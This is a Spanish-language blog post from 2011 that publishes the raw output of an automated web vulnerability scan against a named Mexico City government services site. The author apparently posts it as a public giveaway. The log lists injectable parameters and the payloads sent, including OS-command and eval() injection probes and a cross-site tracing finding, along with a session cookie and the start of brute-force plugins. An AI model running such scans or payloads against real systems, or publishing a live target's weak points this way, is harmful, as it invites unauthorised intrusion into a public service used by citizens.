miércoles, 8 de junio de 2011

Vulnerable www.tramitesyservicios.df.gob.mx/index.php

Saludos Mundo libre

[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: grep.collectCookies
[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: grep.error500
[Wed 08 Jun 2011 11:13:01 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: grep.getMails
[Wed 08 Jun 2011 11:13:02 PM CDT] Auto-enabling plugin: grep.lang
[Wed 08 Jun 2011 11:13:09 PM CDT] The page language is: es
[Wed 08 Jun 2011 11:13:11 PM CDT] The server header for the remote web server is: "Apache". This information was found in the request with id 15.
[Wed 08 Jun 2011 11:13:12 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.8". This information was found in the request with id 16.
[Wed 08 Jun 2011 11:13:17 PM CDT] Starting formAuthBrute plugin execution.
[Wed 08 Jun 2011 11:13:17 PM CDT] Starting basicAuthBrute plugin execution.
[Wed 08 Jun 2011 11:13:17 PM CDT] Found 1 URLs and 6 different points of injection.
[Wed 08 Jun 2011 11:13:17 PM CDT] The list of URLs is:
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php
[Wed 08 Jun 2011 11:13:17 PM CDT] The list of fuzzable requests is:
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: GET
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll", voteid="109", voteid="110", voteid="111", voteid="112")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (task="search", option="com_search", searchword="buscar...")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (voteid="109", 9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (voteid="111", 9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll")
[Wed 08 Jun 2011 11:13:17 PM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php | Method: POST | Parameters: (voteid="112", 9f45efe675d5d419221a6e9c7a9f8716="1", task="vote", id="23", option="Resultados", option="com_poll")
[Wed 08 Jun 2011 11:13:25 PM CDT] The web application sent a persistent cookie.
[Wed 08 Jun 2011 11:17:30 PM CDT] An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=search&option=d'kc"z'gj'"%2A%2A5%2A(((%3B-%2A%60)&searchword=buscar...". The modified parameter was "option". This vulnerability was found in the request with id 248.
[Wed 08 Jun 2011 11:17:30 PM CDT] An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=&voteid=109&id=23". The modified parameter was "9f45efe675d5d419221a6e9c7a9f8716". This vulnerability was found in the request with id 264.
[Wed 08 Jun 2011 11:17:30 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.8". This information was found in the request with id 16.
[Wed 08 Jun 2011 11:17:30 PM CDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 18 and 19.
[Wed 08 Jun 2011 11:17:30 PM CDT] The URL: "http://www.tramitesyservicios.df.gob.mx/index.php" sent the cookie: "c97ff6ec87c98e0223c2d084cb9785c9=ncfl3sq0r86kqkfuu0smk83km3; path=/". This information was found in the request with id 1.
[Wed 08 Jun 2011 11:30:26 PM CDT] A possible OS Commanding was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=run+ping+-n+3+localhost&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "task".Please review manually. This information was found in the request with id 1706.
[Wed 08 Jun 2011 11:37:27 PM CDT] eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=import+time%3Btime.sleep(9)%3B&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=109&id=23". The modified parameter was "task". . Please review manually. This information was found in the request with id 2754.
[Wed 08 Jun 2011 11:46:23 PM CDT] The web server at "http://www.tramitesyservicios.df.gob.mx/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 3631.
[Thu 09 Jun 2011 12:00:37 AM CDT] Password profiling TOP 100:
[Thu 09 Jun 2011 12:00:37 AM CDT] - [1] Servicios with 5544 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [2] atender with 4203 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [3] consideras with 4203 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [4] oportuno with 4203 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [5] tiempo with 4203 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [6] Regresar with 2541 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [7] Principal with 2541 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [8] Puedes with 2505 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [9] consultar with 2505 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [10] Responsables with 1832 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [11] derechos with 1751 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [12] Oficial with 1751 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [13] General with 1751 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [14] LOCATEL with 1751 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [15] agua with 1688 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [16] formatos with 1670 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [17] Twitter with 1668 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [18] tiene with 1666 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [19] tarjeta with 1666 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [20] Junio with 1327 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [21] cinco with 1246 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [22] diez with 1246 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [23] Buscar with 1218 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [24] Distrito with 922 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [25] dependencias with 922 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [26] llama with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [27] Inicio with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [28] YtSettings with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [29] YOOeffects with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [30] Fiscal with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [31] Normatividad with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [32] acude with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [33] sugerencia with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [34] denuncia with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [35] Busca with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [36] Manuales with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [37] reglas with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [38] Formatos with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [39] Internas with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [40] Contralores with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [41] planta with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [42] tema with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [43] delegaciones with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [44] Federal with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [45] Conoce with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [46] CESAC with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [47] Directorios with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [48] Gaceta with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [49] cualquier with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [50] obligaciones with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [51] Operativo with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [52] Ciudadanos with 916 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [53] requisitos with 841 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [54] Gobierno with 841 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [55] certificadas with 841 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [56] Asistencia with 841 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [57] procedimiento with 841 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [58] vigencia with 839 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [59] esta with 839 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [60] celular with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [61] domicilio with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [62] brindarte with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [63] YouTube with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [64] Fugas with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [65] Ciudadana with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [66] pagos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [67] pago with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [68] Universal with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [69] ingresar with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [70] Encuesta with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [71] relativo with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [72] recordamos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [73] Honestel with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [74] Establecimientos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [75] pronta with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [76] Videos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [77] CURP with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [78] Calcula with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [79] permisos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [80] listado with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [81] comprometida with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [82] Pasaporte with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [83] avisos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [84] denuncias with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [85] garantiza with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [86] establecimientos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [87] tarifa with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [88] Copias with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [89] Permisos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [90] videos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [91] Cazabaches with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [92] confidencialidad with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [93] mercantiles with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [94] mejor with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [95] captura with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [96] Sistema with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [97] Formato with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [98] Avisos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [99] nuevos with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] - [100] SSPDF with 835 repetitions.
[Thu 09 Jun 2011 12:00:37 AM CDT] The cookie: "c97ff6ec87c98e0223c2d084cb9785c9=ncfl3sq0r86kqkfuu0smk83km3; path=/" was sent by these URLs:
[Thu 09 Jun 2011 12:00:37 AM CDT] - http://www.tramitesyservicios.df.gob.mx/index.php
[Thu 09 Jun 2011 12:00:37 AM CDT] Finished scanning process.

generic:generic:

Unidentified vulnerabilidad
An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=search&option=d'kc"z'gj'"%2A%2A5%2A(((%3B-%2A%60)&searchword=buscar...". The modified parameter was "option". This vulnerability was found in the request with id 248.

Unidentified vulnerabilidad
An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=search&option=&searchword=buscar...". The modified parameter was "option". This vulnerability was found in the request with id 250.

Unidentified vulnerabilidad
An unidentified vulnerability was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=&voteid=109&id=23". The modified parameter was "9f45efe675d5d419221a6e9c7a9f8716". This vulnerability was found in the request with id 264.

osCommanding:osCommanding:Possible OS commanding vulnerability
A possible OS Commanding was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=run+ping+-n+3+localhost&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "task".Please review manually. This information was found in the request with id 1706.

eval:eval:eval()input injection vulnerability
eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=import+time%3Btime.sleep(9)%3B&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=109&id=23". The modified parameter was "task". . Please review manually. This information was found in the request with id 2754.

eval()input injection vulnerability
eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=import+time%3Btime.sleep(9)%3B&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "option". . Please review manually. This information was found in the request with id 2863.

eval()input injection vulnerability
eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=sleep(9)%3B&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=111&id=23". The modified parameter was "task". . Please review manually. This information was found in the request with id 2865.

eval() input injection was found at: "http://www.tramitesyservicios.df.gob.mx/index.php", using HTTP method POST. The sent post-data was: "task=vote&option=Resultados&option=com_poll&task_button=Votar&9f45efe675d5d419221a6e9c7a9f8716=1&voteid=112&id=Thread.Sleep(9000)%3B". The modified parameter was "id". . Please review manually. This information was found in the request with id 2926.

xst:xst:Cross site tracing vulnerability
The web server at "http://www.tramitesyservicios.df.gob.mx/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 3631.

403 - Acceso prohibido
Es posible que no pueda visitar esta página por:
  1. un bookmark/favorito anticuado
  2. el sistema de búsqueda tieneun listado anticuado para este sitio
  3. a dirección mis-typed
  4. no disponede acceso para esta página
  5. La petición de este recurso no se encuentra
  6. Ocurrió un error al intentar procesar su solicitud.
Intentelo con alguna de estas páginas

si la dificultad persiste, contacte con el administrador de este sitio
Acceso prohibido




Hay Se Las Dejo

Saludos Mundo Libre.
on

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)